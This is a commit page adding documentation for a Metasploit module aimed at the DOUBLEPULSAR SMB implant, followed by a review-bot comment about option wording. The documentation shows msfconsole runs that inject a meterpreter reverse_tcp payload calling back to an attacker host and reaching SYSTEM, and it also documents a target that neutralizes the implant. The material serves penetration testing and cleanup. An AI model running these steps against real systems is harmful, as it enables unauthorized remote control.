Land #12374, Add DOUBLEPULSAR payload execution and neutralization module
Showing 2 changed files with 478 additions and 0 deletions.
documentation/modules/exploit/windows/smb/doublepulsar_rce.md (94 additions & 0 deletions)
@@ -0,0 +1,94 @@ | ||
## Introduction | ||
|
||
This module executes a Metasploit payload against the Equation Group's | ||
DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. | ||
|
||
While this module primarily performs code execution against the implant, | ||
the `Neutralize implant` target allows you to disable the implant. | ||
|
||
## Targets | ||
|
||
``` | ||
Id Name | ||
-- ---- | ||
0 Execute payload | ||
1 Neutralize implant | ||
``` | ||
|
||
## Options | ||
|
||
**DefangedMode** | ||
|
||
Set this to `false` to disable defanged mode and enable module | ||
functionality. Set this only if you're SURE you want to proceed. | ||
|
||
**ProcessName** | ||
|
||
Set this to the userland process you want to inject the payload into. | ||
Defaults to `spoolsv.exe`. | ||
|
||
## Usage | ||
|
||
Pinging the implant: | ||
|
||
``` | ||
msf5 exploit(windows/smb/doublepulsar_rce) > check | ||
[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048 | ||
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1 | ||
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR | ||
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64 | ||
[+] 192.168.56.115:445 - The target is vulnerable. | ||
msf5 exploit(windows/smb/doublepulsar_rce) > | ||
``` | ||
|
||
Executing a payload: | ||
|
||
``` | ||
msf5 exploit(windows/smb/doublepulsar_rce) > set target Execute\ payload | ||
target => Execute payload | ||
msf5 exploit(windows/smb/doublepulsar_rce) > run | ||
[*] Started reverse TCP handler on 192.168.56.1:4444 | ||
[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048 | ||
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1 | ||
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR | ||
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64 | ||
[*] 192.168.56.115:445 - Generating kernel shellcode with windows/x64/meterpreter/reverse_tcp | ||
[*] 192.168.56.115:445 - Total shellcode length: 4096 bytes | ||
[*] 192.168.56.115:445 - Encrypting shellcode with XOR key 0x33C6DC64 | ||
[*] 192.168.56.115:445 - Sending shellcode to DOUBLEPULSAR | ||
[+] 192.168.56.115:445 - Payload execution successful | ||
[*] Sending stage (206403 bytes) to 192.168.56.115 | ||
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.115:49158) at 2019-09-25 18:26:47 -0500 | ||
meterpreter > getuid | ||
Server username: NT AUTHORITY\SYSTEM | ||
meterpreter > sysinfo | ||
Computer : WIN-S7TDBIENPVM | ||
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1). | ||
Architecture : x64 | ||
System Language : en_US | ||
Domain : WORKGROUP | ||
Logged On Users : 1 | ||
Meterpreter : x64/windows | ||
meterpreter > | ||
``` | ||
|
||
Neutralizing the implant: | ||
|
||
``` | ||
msf5 exploit(windows/smb/doublepulsar_rce) > set target Neutralize\ implant | ||
target => Neutralize implant | ||
msf5 exploit(windows/smb/doublepulsar_rce) > run | ||
[*] Started reverse TCP handler on 192.168.56.1:4444 | ||
[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048 | ||
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1 | ||
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR | ||
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64 | ||
[*] 192.168.56.115:445 - Neutralizing DOUBLEPULSAR | ||
[+] 192.168.56.115:445 - Implant neutralization successful | ||
[*] Exploit completed, but no session was created. | ||
msf5 exploit(windows/smb/doublepulsar_rce) > | ||
``` |
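Review bot: the ProcessName option is described as the userland process the payload is injected into, but nothing in the Options section says it applies only to the `Execute payload` target; the `Neutralize implant` run at the end of the hunk never injects anything, so a qualifier such as "Only used with the `Execute payload` target." under ProcessName would avoid confusion. Similarly, DefangedMode tells the reader to set it to `false` without saying what the module does while defanged, which leaves the "Set this only if you're SURE" warning without context; one sentence stating the default behaviour would make it meaningful. It would also help to note in the "Neutralizing the implant" example that a reverse TCP handler is still started even though no payload is sent, since the log shows that and a reader may otherwise expect a session.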